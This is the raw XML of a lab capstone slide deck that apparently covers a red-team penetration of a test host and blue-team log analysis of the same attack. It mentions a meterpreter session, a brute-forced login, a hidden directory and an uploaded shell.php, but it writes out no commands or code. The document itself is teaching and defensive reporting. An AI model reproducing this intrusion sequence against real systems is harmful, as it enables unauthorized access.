                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>From the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> session, we are able to maneuver within the system:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="14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400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Ability to download a file.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="14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4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4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4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4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4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4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4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4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400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Successfully downloaded this ‘flag.txt’ file into our Kali (attacker) machine:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="14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4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endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1259" name="Google Shape;1259;p2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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1260" name="Google Shape;1260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0105" y="1508714"/>
            <a:ext cx="5386273" cy="1508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268;gdca5c3f7c4_0_12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EE76A37-7398-4990-8E09-0F986A451400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0105" y="3667518"/>
            <a:ext cx="6424880" cy="8946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3" name="Google Shape;1273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274" name="Google Shape;1274;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1687275"/>
            <a:ext cx="8595300" cy="88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b="1"/>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr b="1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-US" sz="3400">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Log Analysis and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="34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-US" sz="3400">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr sz="3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75" name="Google Shape;1275;p26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en-US"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15</a:t>
            </a:fld>
            <a:endParaRPr sz="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p3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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis: Identifying Capstone Traffic</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US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 sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>From the ‘Top Hosts Creating Traffic’ report, we can see a lot of high traffic coming from the Capstone’s (victim) machine @ 192.168.1.105.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri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     -  There was a sudden spike over time on May 6, 2021.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"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 dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1322" name="Google Shape;1322;p3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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323" name="Google Shape;1323;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439922" y="1355271"/>
            <a:ext cx="8409300" cy="2918460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14117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9182FC-7018-4E88-B682-C78DD8E61F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0608" y="1396199"/>
            <a:ext cx="5207928" cy="283660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3" name="Google Shape;1353;p3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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis: Identifying Request for Hidden Directory</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US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 sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>From the ‘Top 10 HTTP requests’ report, we can see that the ‘/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’ directory had a high request count.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1354" name="Google Shape;1354;p3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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1355" name="Google Shape;1355;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437192" y="1426793"/>
            <a:ext cx="8409300" cy="2746060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14117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56" name="Google Shape;1356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86343" y="1524553"/>
            <a:ext cx="4710998" cy="25505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" name="Google Shape;1361;p3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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis: Identifying Request for Hidden Directory (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>con’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US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 sz="14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request for the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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’ directory started on May 6, 2021 @ 02:31.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1362" name="Google Shape;1362;p3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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1363" name="Google Shape;1363;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="443550" y="1239937"/>
            <a:ext cx="8409300" cy="2384100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14117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64" name="Google Shape;1364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2253" y="1812178"/>
            <a:ext cx="8351893" cy="12040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5" name="Google Shape;1385;p4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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis: Identifying Brute Force Attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US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 sz="14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Search results for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>connect_to_corp_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>’ file in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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‘/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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’ directory, indicates the file was successfully accessed 2 times.</a:t>
            </a:r>
            <a:endParaRPr sz="14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86" name="Google Shape;1386;p4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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1387" name="Google Shape;1387;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457795" y="1422133"/>
            <a:ext cx="8409300" cy="2947615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14117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88" name="Google Shape;1388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92317" y="1611733"/>
            <a:ext cx="7518252" cy="25617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Table of Contents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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1025" name="Google Shape;1025;p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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This document contains the following sections:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026" name="Google Shape;1026;p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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Google Shape;1027;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="1269771"/>
            <a:ext cx="7517100" cy="504515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28" name="Google Shape;1028;p2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1269759"/>
            <a:ext cx="776889" cy="504515"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1029" name="Google Shape;1029;p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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000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 b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000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0" name="Google Shape;1030;p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31" name="Google Shape;1031;p2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1999887"/>
            <a:ext cx="776889" cy="532410"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1032" name="Google Shape;1032;p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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="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 b="0" i="0" u="none" strike="noStrike" cap="none" dirty="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3" name="Google Shape;1033;p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34" name="Google Shape;1034;p2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2730109"/>
            <a:ext cx="776889" cy="568628"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1035" name="Google Shape;1035;p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3D85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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="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 b="0" i="0" u="none" strike="noStrike" cap="none" dirty="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6" name="Google Shape;1036;p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3D85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37" name="Google Shape;1037;p2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3528409"/>
            <a:ext cx="776889" cy="524404"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1038" name="Google Shape;1038;p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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="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 b="0" i="0" u="none" strike="noStrike" cap="none" dirty="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9" name="Google Shape;1039;p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40" name="Google Shape;1040;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1236739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b="1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Network Topology</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1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1" name="Google Shape;1041;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="2002298"/>
            <a:ext cx="7517100" cy="53241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2" name="Google Shape;1042;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="2770049"/>
            <a:ext cx="7517100" cy="528688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3" name="Google Shape;1043;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352550" y="3523634"/>
            <a:ext cx="7517100" cy="524404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4" name="Google Shape;1044;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-31968" y="1960721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b="1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Red Team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Security Assessment</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0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5" name="Google Shape;1045;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-31968" y="272872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b="1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Blue Team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Log Analysis and Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0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6" name="Google Shape;1046;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-31968" y="3504182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b="1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Hardening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Proposed Alarms and Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0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9" name="Google Shape;1037;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE56AC5-D9D6-46B6-A221-5FAD79081BEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4320541"/>
            <a:ext cx="776889" cy="524404"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Google Shape;1038;p2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19D071CC-1DED-4824-A6A2-ADF58C56A02D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="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 b="0" i="0" u="none" strike="noStrike" cap="none" dirty="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1" name="Google Shape;1039;p2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8EBAFF-BEDA-42C2-9A25-E7BB7E8B857B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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2" name="Google Shape;1043;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E2D6F3A-9F61-4AA5-A35C-E33BEB0EFC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304783" y="4295467"/>
            <a:ext cx="7517100" cy="524404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en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none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sym typeface="Arial"/>
              </a:rPr>
              <a:t>Appendix</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="41" name="Google Shape;1037;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B3DF47-A41B-4B64-BF5C-61DBD431BDAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4314907"/>
            <a:ext cx="776889" cy="524404"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Google Shape;1038;p2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{255FEF0B-49F1-4301-8159-AE63FDCC5B1C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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-US" sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="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 b="0" i="0" u="none" strike="noStrike" cap="none" dirty="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43" name="Google Shape;1039;p2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DE9760C-ECB4-4A74-AA10-DF620AE031F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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4" name="Google Shape;1043;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4C0FDE6-8894-4D90-BCF8-84692B841452}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304783" y="4289833"/>
            <a:ext cx="7517100" cy="524404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en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none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sym typeface="Arial"/>
              </a:rPr>
              <a:t>Appendix</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0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3" name="Google Shape;1393;p4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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis: Identifying Brute Force Attack (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>con’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US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 sz="14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log from May 6, 2021 indicates that the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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connect_to_corp_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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’ file was accessed using the username ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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’.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1394" name="Google Shape;1394;p4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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1395" name="Google Shape;1395;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1379700"/>
            <a:ext cx="8409300" cy="2384100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14117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96" name="Google Shape;1396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62990" y="1611090"/>
            <a:ext cx="6418020" cy="1921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1" name="Google Shape;1401;p4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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis: Finding WebDAV Connection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US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 sz="14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From the ‘Top 10 HTTP requests’ report, we can see the ‘http://192.168.1.105/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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’ directory was requested 60 times.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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-  Within this directory, we were able to view files such as the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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’ file. </a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1402" name="Google Shape;1402;p4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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1403" name="Google Shape;1403;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450445" y="1377768"/>
            <a:ext cx="8409300" cy="2518400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14117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04" name="Google Shape;1404;p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12242" y="1554182"/>
            <a:ext cx="4584300" cy="213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" name="Google Shape;1417;p4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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysis: Finding WebDAV Connection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>con’t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US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 sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>By searching for the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
